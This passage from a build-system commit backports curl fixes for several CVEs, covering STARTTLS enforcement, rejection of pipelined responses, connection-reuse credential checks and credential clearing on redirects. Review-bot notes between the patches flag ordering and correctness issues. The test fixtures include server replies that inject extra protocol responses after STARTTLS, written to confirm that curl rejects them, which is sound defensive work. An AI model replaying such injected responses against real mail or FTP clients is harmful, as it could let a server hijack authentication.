+- return ftp_state_user_resp(conn, ftpcode, ftpc->state);
++ if(ftpcode == 230) {
++ /* 230 User logged in - already! Take as 220 if TLS required. */
++ if(data->set.use_ssl <= CURLUSESSL_TRY ||
++ conn->bits.ftp_use_control_ssl)
++ return ftp_state_user_resp(conn, ftpcode, ftpc->state);
++ }
+ else if(ftpcode != 220) {
+ failf(data, "Got a %03d ftp-server response when 220 was expected",
+ ftpcode);
+diff --git a/lib/imap.c b/lib/imap.c
+index 66172bd..9880ce1 100644
+--- a/lib/imap.c
++++ b/lib/imap.c
+@@ -917,22 +917,18 @@ static CURLcode imap_state_capability_resp(struct connectdata *conn,
+ line += wordlen;
+ }
+ }
+- else if(imapcode == IMAP_RESP_OK) {
+- if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) {
+- /* We don't have a SSL/TLS connection yet, but SSL is requested */
+- if(imapc->tls_supported)
+- /* Switch to TLS connection now */
+- result = imap_perform_starttls(conn);
+- else if(data->set.use_ssl == CURLUSESSL_TRY)
+- /* Fallback and carry on with authentication */
+- result = imap_perform_authentication(conn);
+- else {
+- failf(data, "STARTTLS not supported.");
+- result = CURLE_USE_SSL_FAILED;
+- }
++ else if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) {
++ /* PREAUTH is not compatible with STARTTLS. */
++ if(imapcode == IMAP_RESP_OK && imapc->tls_supported && !imapc->preauth) {
++ /* Switch to TLS connection now */
++ result = imap_perform_starttls(conn);
+ }
+- else
++ else if(data->set.use_ssl <= CURLUSESSL_TRY)
+ result = imap_perform_authentication(conn);
++ else {
++ failf(data, "STARTTLS not available.");
++ result = CURLE_USE_SSL_FAILED;
++ }
+ }
+ else
+ result = imap_perform_authentication(conn);
+diff --git a/lib/pop3.c b/lib/pop3.c
+index 57c1373..145b2b4 100644
+--- a/lib/pop3.c
++++ b/lib/pop3.c
+@@ -721,28 +721,23 @@ static CURLcode pop3_state_capa_resp(struct connectdata *conn, int pop3code,
+ }
+ }
+ }
+- else if(pop3code == '+') {
+- if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) {
+- /* We don't have a SSL/TLS connection yet, but SSL is requested */
+- if(pop3c->tls_supported)
+- /* Switch to TLS connection now */
+- result = pop3_perform_starttls(conn);
+- else if(data->set.use_ssl == CURLUSESSL_TRY)
+- /* Fallback and carry on with authentication */
+- result = pop3_perform_authentication(conn);
+- else {
+- failf(data, "STLS not supported.");
+- result = CURLE_USE_SSL_FAILED;
+- }
+- }
+- else
+- result = pop3_perform_authentication(conn);
+- }
+ else {
+ /* Clear text is supported when CAPA isn't recognised */
+- pop3c->authtypes |= POP3_TYPE_CLEARTEXT;
++ if(pop3code != '+')
++ pop3c->authtypes |= POP3_TYPE_CLEARTEXT;
+
+- result = pop3_perform_authentication(conn);
++ if(!data->set.use_ssl || conn->ssl[FIRSTSOCKET].use)
++ result = pop3_perform_authentication(conn);
++ else if(pop3code == '+' && pop3c->tls_supported)
++ /* Switch to TLS connection now */
++ result = pop3_perform_starttls(conn);
++ else if(data->set.use_ssl <= CURLUSESSL_TRY)
++ /* Fallback and carry on with authentication */
++ result = pop3_perform_authentication(conn);
++ else {
++ failf(data, "STLS not supported.");
++ result = CURLE_USE_SSL_FAILED;
++ }
+ }
+
+ return result;
+diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
+index f9535a6..0fa6799 100644
+--- a/tests/data/Makefile.inc
++++ b/tests/data/Makefile.inc
+@@ -112,6 +112,8 @@ test945 test946 test947 test948 test949 test950 test951 test952 test953 \
+ test954 test955 test956 test957 test958 test959 test960 test961 test962 \
+ test963 test964 test965 test966 test967 test968 test969 \
+ \
++test984 test985 test986 \
++\
+ test1000 test1001 test1002 test1003 test1004 test1005 test1006 test1007 \
+ test1008 test1009 test1010 test1011 test1012 test1013 test1014 test1015 \
+ test1016 test1017 test1018 test1019 test1020 test1021 test1022 test1023 \
+diff --git a/tests/data/test984 b/tests/data/test984
+new file mode 100644
+index 0000000..e573f23
+--- /dev/null
++++ b/tests/data/test984
+@@ -0,0 +1,56 @@
++<testcase>
++<info>
++<keywords>
++IMAP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++REPLY CAPABILITY A001 BAD Not implemented
++</servercmd>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++imap
++</server>
++ <name>
++IMAP require STARTTLS with failing capabilities
++ </name>
++ <command>
++imap://%HOSTIP:%IMAPPORT/%TESTNUMBER -T log/upload%TESTNUMBER -u user:secret --ssl-reqd
++</command>
++<file name="log/upload%TESTNUMBER">
++Date: Mon, 7 Feb 1994 21:52:25 -0800 (PST)
++From: Fred Foobar <foobar@example.COM>
++Subject: afternoon meeting
++To: joe@example.com
++Message-Id: <B27397-0100000@example.COM>
++MIME-Version: 1.0
++Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
++
++Hello Joe, do you think we can meet at 3:30 tomorrow?
++</file>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 64 is CURLE_USE_SSL_FAILED
++<errorcode>
++64
++</errorcode>
++<protocol>
++A001 CAPABILITY
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test985 b/tests/data/test985
+new file mode 100644
+index 0000000..d0db4aa
+--- /dev/null
++++ b/tests/data/test985
+@@ -0,0 +1,54 @@
++<testcase>
++<info>
++<keywords>
++POP3
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++REPLY CAPA -ERR Not implemented
++</servercmd>
++<data nocheck="yes">
++From: me@somewhere
++To: fake@nowhere
++
++body
++
++--
++ yours sincerely
++</data>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++pop3
++</server>
++ <name>
++POP3 require STARTTLS with failing capabilities
++ </name>
++ <command>
++pop3://%HOSTIP:%POP3PORT/%TESTNUMBER -u user:secret --ssl-reqd
++ </command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 64 is CURLE_USE_SSL_FAILED
++<errorcode>
++64
++</errorcode>
++<protocol>
++CAPA
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test986 b/tests/data/test986
+new file mode 100644
+index 0000000..a709437
+--- /dev/null
++++ b/tests/data/test986
+@@ -0,0 +1,53 @@
++<testcase>
++<info>
++<keywords>
++FTP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++REPLY welcome 230 Welcome
++REPLY AUTH 500 unknown command
++</servercmd>
++</reply>
++
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++ftp
++</server>
++ <name>
++FTP require STARTTLS while preauthenticated
++ </name>
++<file name="log/test%TESTNUMBER.txt">
++data
++ to
++ see
++that FTPS
++works
++ so does it?
++</file>
++ <command>
++--ssl-reqd --ftp-ssl-control ftp://%HOSTIP:%FTPPORT/%TESTNUMBER -T log/test%TESTNUMBER.txt -u user:secret
++</command>
++</client>
++
++# Verify data after the test has been "shot"
++<verify>
++# 64 is CURLE_USE_SSL_FAILED
++<errorcode>
++64
++</errorcode>
++<protocol>
++AUTH SSL
++AUTH TLS
++</protocol>
++</verify>
++</testcase>
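Review bot: The new tests `data->set.use_ssl <= CURLUSESSL_TRY` in the lib/ftp.c, lib/imap.c and lib/pop3.c hunks rely on the numeric order of the CURLUSESSL_* values, whereas the lines they replace used `== CURLUSESSL_TRY`. In imap.c and pop3.c the enclosing condition already requires `data->set.use_ssl` to be non-zero, so `<=` and `==` are equivalent there. In the FTP_WAIT220 case the `<=` deliberately also covers "no TLS requested". A one-line comment at each site, for example `/* use_ssl is NONE or TRY: TLS is not mandatory, so continuing in cleartext is allowed */`, would keep a later refresh from tightening or loosening the check by accident. The three added tests exercise only the `--ssl-reqd` failure path. The enclosing functions start and end outside the hunks.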
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22947.patch b/meta/recipes-support/curl/curl/CVE-2021-22947.patch
new file mode 100644
index 0000000000..070a328e27
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22947.patch
@@ -0,0 +1,352 @@
+Backport of:
+
+From 259b4f2e1fd01fbc55e569ee0a507afeae34f77c Mon Sep 17 00:00:00 2001
+From: Patrick Monnerat <patrick@monnerat.net>
+Date: Tue, 7 Sep 2021 13:26:42 +0200
+Subject: [PATCH] ftp,imap,pop3,smtp: reject STARTTLS server response
+ pipelining
+
+If a server pipelines future responses within the STARTTLS response, the
+former are preserved in the pingpong cache across TLS negotiation and
+used as responses to the encrypted commands.
+
+This fix detects pipelined STARTTLS responses and rejects them with an
+error.
+
+Bug: https://curl.se/docs/CVE-2021-22947.html
+Upstream-Status: backport from 7.68.0-1ubuntu2.7
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+CVE: CVE-2021-22947
+
+---
+ lib/ftp.c | 3 +++
+ lib/imap.c | 4 +++
+ lib/pop3.c | 4 +++
+ lib/smtp.c | 4 +++
+ tests/data/Makefile.inc | 2 ++
+ tests/data/test980 | 52 ++++++++++++++++++++++++++++++++++++
+ tests/data/test981 | 59 +++++++++++++++++++++++++++++++++++++++++
+ tests/data/test982 | 57 +++++++++++++++++++++++++++++++++++++++
+ tests/data/test983 | 52 ++++++++++++++++++++++++++++++++++++
+ 9 files changed, 237 insertions(+)
+ create mode 100644 tests/data/test980
+ create mode 100644 tests/data/test981
+ create mode 100644 tests/data/test982
+ create mode 100644 tests/data/test983
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 91b43d8..31a34e8 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -2670,6 +2670,9 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
+ case FTP_AUTH:
+ /* we have gotten the response to a previous AUTH command */
+
++ if(pp->cache_size)
++ return CURLE_WEIRD_SERVER_REPLY; /* Forbid pipelining in response. */
++
+ /* RFC2228 (page 5) says:
+ *
+ * If the server is willing to accept the named security mechanism,
+diff --git a/lib/imap.c b/lib/imap.c
+index 9880ce1..0ca700f 100644
+--- a/lib/imap.c
++++ b/lib/imap.c
+@@ -946,6 +946,10 @@ static CURLcode imap_state_starttls_resp(struct connectdata *conn,
+
+ (void)instate; /* no use for this yet */
+
++ /* Pipelining in response is forbidden. */
++ if(data->conn->proto.imapc.pp.cache_size)
++ return CURLE_WEIRD_SERVER_REPLY;
++
+ if(imapcode != IMAP_RESP_OK) {
+ if(data->set.use_ssl != CURLUSESSL_TRY) {
+ failf(data, "STARTTLS denied");
+diff --git a/lib/pop3.c b/lib/pop3.c
+index 145b2b4..8a2d52e 100644
+--- a/lib/pop3.c
++++ b/lib/pop3.c
+@@ -753,6 +753,10 @@ static CURLcode pop3_state_starttls_resp(struct connectdata *conn,
+
+ (void)instate; /* no use for this yet */
+
++ /* Pipelining in response is forbidden. */
++ if(data->conn->proto.pop3c.pp.cache_size)
++ return CURLE_WEIRD_SERVER_REPLY;
++
+ if(pop3code != '+') {
+ if(data->set.use_ssl != CURLUSESSL_TRY) {
+ failf(data, "STARTTLS denied");
+diff --git a/lib/smtp.c b/lib/smtp.c
+index e187287..66183e2 100644
+--- a/lib/smtp.c
++++ b/lib/smtp.c
+@@ -820,6 +820,10 @@ static CURLcode smtp_state_starttls_resp(struct connectdata *conn,
+
+ (void)instate; /* no use for this yet */
+
++ /* Pipelining in response is forbidden. */
++ if(data->conn->proto.smtpc.pp.cache_size)
++ return CURLE_WEIRD_SERVER_REPLY;
++
+ if(smtpcode != 220) {
+ if(data->set.use_ssl != CURLUSESSL_TRY) {
+ failf(data, "STARTTLS denied, code %d", smtpcode);
+diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
+index 0fa6799..60e8176 100644
+--- a/tests/data/Makefile.inc
++++ b/tests/data/Makefile.inc
+@@ -112,6 +112,8 @@ test945 test946 test947 test948 test949 test950 test951 test952 test953 \
+ test954 test955 test956 test957 test958 test959 test960 test961 test962 \
+ test963 test964 test965 test966 test967 test968 test969 \
+ \
++test980 test981 test982 test983 \
++\
+ test984 test985 test986 \
+ \
+ test1000 test1001 test1002 test1003 test1004 test1005 test1006 test1007 \
+diff --git a/tests/data/test980 b/tests/data/test980
+new file mode 100644
+index 0000000..97567f8
+--- /dev/null
++++ b/tests/data/test980
+@@ -0,0 +1,52 @@
++<testcase>
++<info>
++<keywords>
++SMTP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++CAPA STARTTLS
++AUTH PLAIN
++REPLY STARTTLS 454 currently unavailable\r\n235 Authenticated\r\n250 2.1.0 Sender ok\r\n250 2.1.5 Recipient ok\r\n354 Enter mail\r\n250 2.0.0 Accepted
++REPLY AUTH 535 5.7.8 Authentication credentials invalid
++</servercmd>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++smtp
++</server>
++ <name>
++SMTP STARTTLS pipelined server response
++ </name>
++<stdin>
++mail body
++</stdin>
++ <command>
++smtp://%HOSTIP:%SMTPPORT/%TESTNUMBER --mail-rcpt recipient@example.com --mail-from sender@example.com -u user:secret --ssl --sasl-ir -T -
++</command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 8 is CURLE_WEIRD_SERVER_REPLY
++<errorcode>
++8
++</errorcode>
++<protocol>
++EHLO %TESTNUMBER
++STARTTLS
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test981 b/tests/data/test981
+new file mode 100644
+index 0000000..2b98ce4
+--- /dev/null
++++ b/tests/data/test981
+@@ -0,0 +1,59 @@
++<testcase>
++<info>
++<keywords>
++IMAP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++CAPA STARTTLS
++REPLY STARTTLS A002 BAD currently unavailable\r\nA003 OK Authenticated\r\nA004 OK Accepted
++REPLY LOGIN A003 BAD Authentication credentials invalid
++</servercmd>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++imap
++</server>
++ <name>
++IMAP STARTTLS pipelined server response
++ </name>
++ <command>
++imap://%HOSTIP:%IMAPPORT/%TESTNUMBER -T log/upload%TESTNUMBER -u user:secret --ssl
++</command>
++<file name="log/upload%TESTNUMBER">
++Date: Mon, 7 Feb 1994 21:52:25 -0800 (PST)
++From: Fred Foobar <foobar@example.COM>
++Subject: afternoon meeting
++To: joe@example.com
++Message-Id: <B27397-0100000@example.COM>
++MIME-Version: 1.0
++Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
++
++Hello Joe, do you think we can meet at 3:30 tomorrow?
++</file>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 8 is CURLE_WEIRD_SERVER_REPLY
++<errorcode>
++8
++</errorcode>
++<protocol>
++A001 CAPABILITY
++A002 STARTTLS
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test982 b/tests/data/test982
+new file mode 100644
+index 0000000..9e07cc0
+--- /dev/null
++++ b/tests/data/test982
+@@ -0,0 +1,57 @@
++<testcase>
++<info>
++<keywords>
++POP3
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++CAPA STLS USER
++REPLY STLS -ERR currently unavailable\r\n+OK user accepted\r\n+OK authenticated
++REPLY PASS -ERR Authentication credentials invalid
++</servercmd>
++<data nocheck="yes">
++From: me@somewhere
++To: fake@nowhere
++
++body
++
++--
++ yours sincerely
++</data>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++pop3
++</server>
++ <name>
++POP3 STARTTLS pipelined server response
++ </name>
++ <command>
++pop3://%HOSTIP:%POP3PORT/%TESTNUMBER -u user:secret --ssl
++ </command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 8 is CURLE_WEIRD_SERVER_REPLY
++<errorcode>
++8
++</errorcode>
++<protocol>
++CAPA
++STLS
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test983 b/tests/data/test983
+new file mode 100644
+index 0000000..300ec45
+--- /dev/null
++++ b/tests/data/test983
+@@ -0,0 +1,52 @@
++<testcase>
++<info>
++<keywords>
++FTP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++REPLY AUTH 500 unknown command\r\n500 unknown command\r\n331 give password\r\n230 Authenticated\r\n257 "/"\r\n200 OK\r\n200 OK\r\n200 OK\r\n226 Transfer complete
++REPLY PASS 530 Login incorrect
++</servercmd>
++</reply>
++
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++ftp
++</server>
++ <name>
++FTP STARTTLS pipelined server response
++ </name>
++<file name="log/test%TESTNUMBER.txt">
++data
++ to
++ see
++that FTPS
++works
++ so does it?
++</file>
++ <command>
++--ssl --ftp-ssl-control ftp://%HOSTIP:%FTPPORT/%TESTNUMBER -T log/test%TESTNUMBER.txt -u user:secret -P %CLIENTIP
++</command>
++</client>
++
++# Verify data after the test has been "shot"
++<verify>
++# 8 is CURLE_WEIRD_SERVER_REPLY
++<errorcode>
++8
++</errorcode>
++<protocol>
++AUTH SSL
++</protocol>
++</verify>
++</testcase>
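Review bot: This patch applies only on top of CVE-2021-22946.patch, and nothing in its header records that. The `lib/ftp.c` index line starts from `91b43d8` and the `tests/data/Makefile.inc` hunk uses `test984 test985 test986` as context. Both are results of that patch, even though the tests added here (980 to 983) sort before them. I would add a header line such as `Note: must be applied after CVE-2021-22946.patch`, and check that the recipe's SRC_URI lists the two in that order; the recipe is not visible in this section.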
diff --git a/meta/recipes-support/curl/curl/CVE-2022-22576.patch b/meta/recipes-support/curl/curl/CVE-2022-22576.patch
new file mode 100644
index 0000000000..13479e7f0e
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-22576.patch
@@ -0,0 +1,148 @@
+From 852aa5ad351ea53e5f01d2f44b5b4370c2bf5425 Mon Sep 17 00:00:00 2001
+From: Patrick Monnerat <patrick@monnerat.net>
+Date: Mon, 25 Apr 2022 11:44:05 +0200
+Subject: [PATCH] url: check sasl additional parameters for connection reuse.
+
+Also move static function safecmp() as non-static Curl_safecmp() since
+its purpose is needed at several places.
+
+Bug: https://curl.se/docs/CVE-2022-22576.html
+
+CVE-2022-22576
+
+Closes #8746
+---
+ lib/strcase.c | 10 ++++++++++
+ lib/strcase.h | 2 ++
+ lib/url.c | 13 ++++++++++++-
+ lib/urldata.h | 1 +
+ lib/vtls/vtls.c | 21 ++++++---------------
+ 5 files changed, 31 insertions(+), 16 deletions(-)
+
+CVE: CVE-2022-22576
+Upstream-Status: Backport [https://github.com/curl/curl/commit/852aa5ad351ea53e5f01d2f44b5b4370c2bf5425.patch]
+Comment: Refreshed patch
+Signed-off-by: Sana.Kazi <Sana.Kazi@kpit.com>
+
+diff --git a/lib/strcase.c b/lib/strcase.c
+index dd46ca1ba0e5..692a3f14aee7 100644
+--- a/lib/strcase.c
++++ b/lib/strcase.c
+@@ -251,6 +251,16 @@
+ } while(*src++ && --n);
+ }
+
++/* Compare case-sensitive NUL-terminated strings, taking care of possible
++ * null pointers. Return true if arguments match.
++ */
++bool Curl_safecmp(char *a, char *b)
++{
++ if(a && b)
++ return !strcmp(a, b);
++ return !a && !b;
++}
++
+ /* --- public functions --- */
+
+ int curl_strequal(const char *first, const char *second)
+diff --git a/lib/strcase.h b/lib/strcase.h
+index b234d3815220..2635f5117e99 100644
+--- a/lib/strcase.h
++++ b/lib/strcase.h
+@@ -48,4 +48,6 @@
+ void Curl_strntoupper(char *dest, const char *src, size_t n);
+ void Curl_strntolower(char *dest, const char *src, size_t n);
+
++bool Curl_safecmp(char *a, char *b);
++
+ #endif /* HEADER_CURL_STRCASE_H */
+diff --git a/lib/url.c b/lib/url.c
+index 9a988b4d58d8..e1647b133854 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -730,6 +730,7 @@
+ Curl_safefree(conn->allocptr.host);
+ Curl_safefree(conn->allocptr.cookiehost);
+ Curl_safefree(conn->allocptr.rtsp_transport);
++ Curl_safefree(conn->oauth_bearer);
+ Curl_safefree(conn->trailer);
+ Curl_safefree(conn->host.rawalloc); /* host name buffer */
+ Curl_safefree(conn->conn_to_host.rawalloc); /* host name buffer */
+@@ -1251,7 +1252,9 @@
+ /* This protocol requires credentials per connection,
+ so verify that we're using the same name and password as well */
+ if(strcmp(needle->user, check->user) ||
+- strcmp(needle->passwd, check->passwd)) {
++ strcmp(needle->passwd, check->passwd) ||
++ !Curl_safecmp(needle->sasl_authzid, check->sasl_authzid) ||
++ !Curl_safecmp(needle->oauth_bearer, check->oauth_bearer)) {
+ /* one of them was different */
+ continue;
+ }
+@@ -3392,6 +3395,14 @@
+ result = CURLE_OUT_OF_MEMORY;
+ goto out;
+ }
++ }
++
++ if(data->set.str[STRING_BEARER]) {
++ conn->oauth_bearer = strdup(data->set.str[STRING_BEARER]);
++ if(!conn->oauth_bearer) {
++ result = CURLE_OUT_OF_MEMORY;
++ goto out;
++ }
+ }
+
+ #ifdef USE_UNIX_SOCKETS
+diff --git a/lib/urldata.h b/lib/urldata.h
+index 07eb19b87034..1d89b8d7fa68 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -949,6 +949,8 @@
+
+ char *sasl_authzid; /* authorisation identity string, allocated */
+
++ char *oauth_bearer; /* OAUTH2 bearer, allocated */
++
+ int httpversion; /* the HTTP version*10 reported by the server */
+ int rtspversion; /* the RTSP version*10 reported by the server */
+
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index 03b85ba065e5..a40ac06f684f 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -82,15 +82,6 @@
+ else \
+ dest->var = NULL;
+
+-static bool safecmp(char *a, char *b)
+-{
+- if(a && b)
+- return !strcmp(a, b);
+- else if(!a && !b)
+- return TRUE; /* match */
+- return FALSE; /* no match */
+-}
+-
+
+ bool
+ Curl_ssl_config_matches(struct ssl_primary_config* data,
+@@ -101,12 +101,12 @@
+ (data->verifypeer == needle->verifypeer) &&
+ (data->verifyhost == needle->verifyhost) &&
+ (data->verifystatus == needle->verifystatus) &&
+- safecmp(data->CApath, needle->CApath) &&
+- safecmp(data->CAfile, needle->CAfile) &&
+- safecmp(data->issuercert, needle->issuercert) &&
+- safecmp(data->clientcert, needle->clientcert) &&
+- safecmp(data->random_file, needle->random_file) &&
+- safecmp(data->egdsocket, needle->egdsocket) &&
++ Curl_safecmp(data->CApath, needle->CApath) &&
++ Curl_safecmp(data->CAfile, needle->CAfile) &&
++ Curl_safecmp(data->issuercert, needle->issuercert) &&
++ Curl_safecmp(data->clientcert, needle->clientcert) &&
++ Curl_safecmp(data->random_file, needle->random_file) &&
++ Curl_safecmp(data->egdsocket, needle->egdsocket) &&
+ Curl_safe_strcasecompare(data->cipher_list, needle->cipher_list) &&
+ Curl_safe_strcasecompare(data->cipher_list13, needle->cipher_list13) &&
+ Curl_safe_strcasecompare(data->pinned_key, needle->pinned_key))
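Review bot: The second `lib/vtls/vtls.c` hunk header, `@@ -101,12 +101,12 @@`, is inconsistent with the hunk before it. `@@ -82,15 +82,6 @@` removes nine lines, so the new-side start should be 92, i.e. `@@ -101,12 +92,12 @@`. Patch tools generally locate hunks by the old-side numbers and will probably still apply it, but the mismatch suggests the "Refreshed patch" was edited by hand. Regenerating the file from a tree with the change applied would give a diff that can be compared mechanically against the upstream commit named in `Upstream-Status`. That matters here because the url.c hunk changes the connection-reuse credential check.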
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-1.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-1.patch
new file mode 100644
index 0000000000..063c11712a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-1.patch
@@ -0,0 +1,45 @@
+From 2a797e099731facf62a2c675396334bc2ad3bc7c Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 16:24:33 +0200
+Subject: [PATCH] connect: store "conn_remote_port" in the info struct
+
+To make it available after the connection ended.
+
+Prerequisite for the patches that address CVE-2022-27774.
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/08b8ef4e726ba10f45081ecda5b3cea788d3c839]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/connect.c | 1 +
+ lib/urldata.h | 6 +++++-
+ 2 files changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/lib/connect.c b/lib/connect.c
+index b3d4057..a977d67 100644
+--- a/lib/connect.c
++++ b/lib/connect.c
+@@ -624,6 +624,7 @@ void Curl_persistconninfo(struct connectdata *conn)
+ conn->data->info.conn_scheme = conn->handler->scheme;
+ conn->data->info.conn_protocol = conn->handler->protocol;
+ conn->data->info.conn_primary_port = conn->primary_port;
++ conn->data->info.conn_remote_port = conn->remote_port;
+ conn->data->info.conn_local_port = conn->local_port;
+ }
+
+diff --git a/lib/urldata.h b/lib/urldata.h
+index fafb7a3..ab1b267 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1148,7 +1148,11 @@ struct PureInfo {
+ reused, in the connection cache. */
+
+ char conn_primary_ip[MAX_IPADR_LEN];
+- long conn_primary_port;
++ long conn_primary_port; /* this is the destination port to the connection,
++ which might have been a proxy */
++ long conn_remote_port; /* this is the "remote port", which is the port
++ number of the used URL, independent of proxy or
++ not */
+ char conn_local_ip[MAX_IPADR_LEN];
+ long conn_local_port;
+ const char *conn_scheme;
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-2.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-2.patch
new file mode 100644
index 0000000000..c64d614194
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-2.patch
@@ -0,0 +1,80 @@
+From 5c2f3b3a5f115625134669d90d591de9c5aafc8e Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 16:24:33 +0200
+Subject: [PATCH] transfer: redirects to other protocols or ports clear auth
+
+... unless explicitly permitted.
+
+Bug: https://curl.se/docs/CVE-2022-27774.html
+Reported-by: Harry Sintonen
+Closes #8748
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/620ea21410030a9977396b4661806bc187231b79]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/transfer.c | 49 ++++++++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 48 insertions(+), 1 deletion(-)
+
+diff --git a/lib/transfer.c b/lib/transfer.c
+index 744e1c0..ac69d27 100644
+--- a/lib/transfer.c
++++ b/lib/transfer.c
+@@ -1627,10 +1627,57 @@ CURLcode Curl_follow(struct Curl_easy *data,
+ return CURLE_OUT_OF_MEMORY;
+ }
+ else {
+-
+ uc = curl_url_get(data->state.uh, CURLUPART_URL, &newurl, 0);
+ if(uc)
+ return Curl_uc_to_curlcode(uc);
++
++ /* Clear auth if this redirects to a different port number or protocol,
++ unless permitted */
++ if(!data->set.allow_auth_to_other_hosts && (type != FOLLOW_FAKE)) {
++ char *portnum;
++ int port;
++ bool clear = FALSE;
++
++ if(data->set.use_port && data->state.allow_port)
++ /* a custom port is used */
++ port = (int)data->set.use_port;
++ else {
++ uc = curl_url_get(data->state.uh, CURLUPART_PORT, &portnum,
++ CURLU_DEFAULT_PORT);
++ if(uc) {
++ free(newurl);
++ return Curl_uc_to_curlcode(uc);
++ }
++ port = atoi(portnum);
++ free(portnum);
++ }
++ if(port != data->info.conn_remote_port) {
++ infof(data, "Clear auth, redirects to port from %u to %u",
++ data->info.conn_remote_port, port);
++ clear = TRUE;
++ }
++ else {
++ char *scheme;
++ const struct Curl_handler *p;
++ uc = curl_url_get(data->state.uh, CURLUPART_SCHEME, &scheme, 0);
++ if(uc) {
++ free(newurl);
++ return Curl_uc_to_curlcode(uc);
++ }
++
++ p = Curl_builtin_scheme(scheme);
++ if(p && (p->protocol != data->info.conn_protocol)) {
++ infof(data, "Clear auth, redirects scheme from %s to %s",
++ data->info.conn_scheme, scheme);
++ clear = TRUE;
++ }
++ free(scheme);
++ }
++ if(clear) {
++ Curl_safefree(data->set.str[STRING_USERNAME]);
++ Curl_safefree(data->set.str[STRING_PASSWORD]);
++ }
++ }
+ }
+
+ if(type == FOLLOW_FAKE) {
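Review bot: The added `infof(data, "Clear auth, redirects to port from %u to %u", data->info.conn_remote_port, port);` passes arguments that do not match its format. CVE-2022-27774-1.patch declares the field as `long conn_remote_port`, and `port` is an `int`, yet both are printed with `%u`. On targets where `long` is wider than `int` this is undefined behaviour in a variadic call, and it sits on the path that drops credentials on a redirect. Either cast at the call, `(unsigned int)data->info.conn_remote_port, (unsigned int)port`, or change the format to `%ld to %d`. Curl_follow()'s body starts and ends outside the hunk.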
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-3.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-3.patch
new file mode 100644
index 0000000000..a585f6a8fa
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-3.patch
@@ -0,0 +1,83 @@
+From 5dccf21ad49eed925e8f76b0cb844877239ce23d Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 17:59:15 +0200
+Subject: [PATCH] openssl: don't leak the SRP credentials in redirects either
+
+Follow-up to 620ea21410030
+
+Reported-by: Harry Sintonen
+Closes #8751
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/139a54ed0a172adaaf1a78d6f4fff50b2c3f9e08]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/http.c | 10 +++++-----
+ lib/http.h | 6 ++++++
+ lib/vtls/openssl.c | 3 ++-
